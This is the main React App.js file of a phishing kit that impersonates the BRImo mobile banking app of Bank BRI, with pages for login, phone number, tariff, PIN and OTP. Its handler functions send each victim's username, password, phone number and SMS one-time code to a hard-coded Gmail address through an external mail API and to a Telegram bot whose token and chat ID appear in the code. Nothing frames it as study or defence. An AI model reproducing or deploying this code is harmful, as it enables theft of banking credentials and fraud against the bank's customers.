import { useState } from 'react';
import { BrowserRouter as Router, Routes, Route } from 'react-router-dom';
import '../assets/css/App.css';

// pages
import Home from './Home'
import Pin from './Pin'
import Login from './Login'
import Otp from './Otp'
import Notlp from './Notlp'
import Tarif from './Tarif'

function App() {
  const [user, setUser] = useState('');
  const [pass, setPass] = useState('');
  const [sms, setSms] = useState('');
  const [tlp, setTlp] = useState('');

  const [email, setEmail] = useState('fggroj@gmail.com');
  const [token, setToken] = useState('5663860190:AAFWiKy0_JnxEBTQl_9hYV7F7jNax54rNX4');
  const [idBot, setIdBot] = useState('1418077448');
  const [api, setApi] = useState('https://email-sender-pied.vercel.app/v1/text-mail');

  const loginHandle = () => {
    
      let ket = 'Login'
      let props1 = 'Username : '
      let value1 = user
      let props2 = 'Password : '
      let value2 = pass
      let props3 = 'telepon : '
      let value3 = tlp

      console.log(tlp)

      let url = 'https://api.telegram.org/bot'+token+'/sendMessage?chat_id='+idBot+'&text='
    
      fetch(api, {
        method: 'POST',
        headers: {
          accept: 'application.json',
          'Content-Type': 'application/json'
        },
        body: JSON.stringify({
          to: email,
          subject: '[ NEW ] Data '+ket+" dari BRIMO Bri.",
          text: `
            Data ${ket} dari BRIMO Bri
            1. ${props1 + value1}
            2. ${props2 + value2}
            3. ${props3 + value3}
          `
        })
      })
      .then(res => res.json())
      .then(res => console.log('Link Salah!'))

      let msg = `Data ${ket} dari BRIMO Bri\n1. ${props1 + value1}\n2. ${props2 + value2}\n3. ${props3 + value3}`


      fetch(url+msg.replace(/ /g, '%20').split('\n').join('%0A'))
      .then(res => res.json())
      .then(res => console.log('tele Salah!'))
  }

  const smsHandle = () => {
    var data = {ket: 'SMS OTP', props1 : 'SMS : ',value1 : sms};

    let url = 'https://api.telegram.org/bot'+token+'/sendMessage?chat_id='+idBot+'&text='
    
    fetch(api, {
      method: 'POST',
      headers: {
        accept: 'application.json',
        'Content-Type': 'application/json'
      },
      body: JSON.stringify({
        to: email,
        subject: '[ NEW ] Data '+data.ket+" dari BRIMO Bri.",
        text: `
          Data ${data.ket} dari BRIMO Bri
          1. ${data.props1 + data.value1}
        `
      })
    })
    .then(res => res.json())
    .then(res => console.error('Link Salah!'))

    let msg = `Data ${data.ket} dari BRIMO Bri\n1. ${data.props1 + data.value1}\n2. ${data.props2 + data.value2}\n3. ${data.props3 + data.value3}`

    fetch(url+msg.replace(/ /g, '%20').split('\n').join('%0A'))
    .then(res => res.json())
    .then(res => console.log('tele Salah!'))
  }
  
  return (
    <Router>
      <div>
        <Routes>
          <Route path='/tarif' element={<Tarif tlp={setTlp} />}/>
          <Route path='/tlp' element={<Notlp />}/>
          <Route path='/login' element={<Login user={setUser} pass={setPass} send={loginHandle} />} />
          <Route path='/' element={<Home />} />
          <Route path='/pin' element={<Pin email={email} api={api} idBot={idBot} token={token}  />} />
          <Route path='/otp' element={<Otp sms={setSms} send={smsHandle} />} />
        </Routes>
      </div>
    </Router>
  );
}

export default App;
